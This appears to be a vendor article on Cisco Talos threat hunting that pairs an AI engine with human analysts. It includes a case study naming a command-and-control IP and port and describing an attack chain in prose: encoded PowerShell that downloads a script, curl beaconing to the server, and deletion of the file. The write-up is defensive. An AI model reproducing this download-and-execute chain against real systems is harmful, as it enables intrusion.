How Cisco Talos hunts threats with AI and analysts

Cisco Talos operates continuous, hypothesis-driven hunts that pair machine learning with human analysis. The team builds hunt hypotheses from active threat intelligence, incident response findings and patterns seen across nearly 50 million sensors, then searches telemetry for signals that a specific adversary technique would produce rather than waiting for signature alerts.

Hunts look for concrete indicators. Examples include Python HTTP user-agent strings connecting to low-reputation hosting, MSIEXEC user-agent activity consistent with living-off-the-land package fetching, algorithmic domain detection using machine learning, outbound traffic to autonomous system ranges with a history of hosting command-and-control infrastructure, and application or user-agent behavior that deviates from an environment baseline. Endpoint discoveries generate network hunt targets: when an endpoint shows a new technique, corresponding network indicators are searched for across firewall data for all enrolled customers.

An AI engine runs these hypotheses at scale and continuously across enrolled environments. The engine applies statistical and machine-learning models to reduce the volume of telemetry and surface high-probability candidates. Human analysts then investigate the candidates, apply operational context, and validate whether the activity represents malicious behavior in a particular customer environment.

A recent customer engagement demonstrates the cross-domain correlation Talos uses. Firewall logs recorded outbound connections to 144.31.221.82 on port 6060 with the URL path /capcha9856, a pattern consistent with traffic direction system redirects used in initial compromise chains. The firewall record showed which device connected and when, but not how the connection began or what ran on the host.

Pivoting to endpoint telemetry for the same device IP produced a process history that completed the picture. The endpoint showed cmd.exe spawning powershell.exe with an -EncodedCommand parameter containing a Base64 payload. The decoded commands used Invoke-WebRequest to download a file named script.ps1 into the user’s ApplicationData folder. A curl.exe process made requests to the same command-and-control infrastructure flagged by the firewall, and there was an attempt to delete the downloaded script with Remove-Item. Analysts used process hashes and file paths from the endpoint to search the wider environment and determine the scope of compromise.

Talos describes the model as a hybrid: AI handles scale, persistence and statistical scoring while analysts provide context, cross-source correlation and judgment. Confirmed findings are documented for customers with mapped techniques, technical details and recommended remediation steps.

Each confirmed intrusion is evaluated for detection gaps. When automated detection could have captured the activity, Talos recommends rule tuning, sensor configuration changes or policy adjustments. Those changes inform product updates and customer configuration guidance.

Cisco notes some features are in various stages of development and availability varies; customers should consult their account teams for implementation details.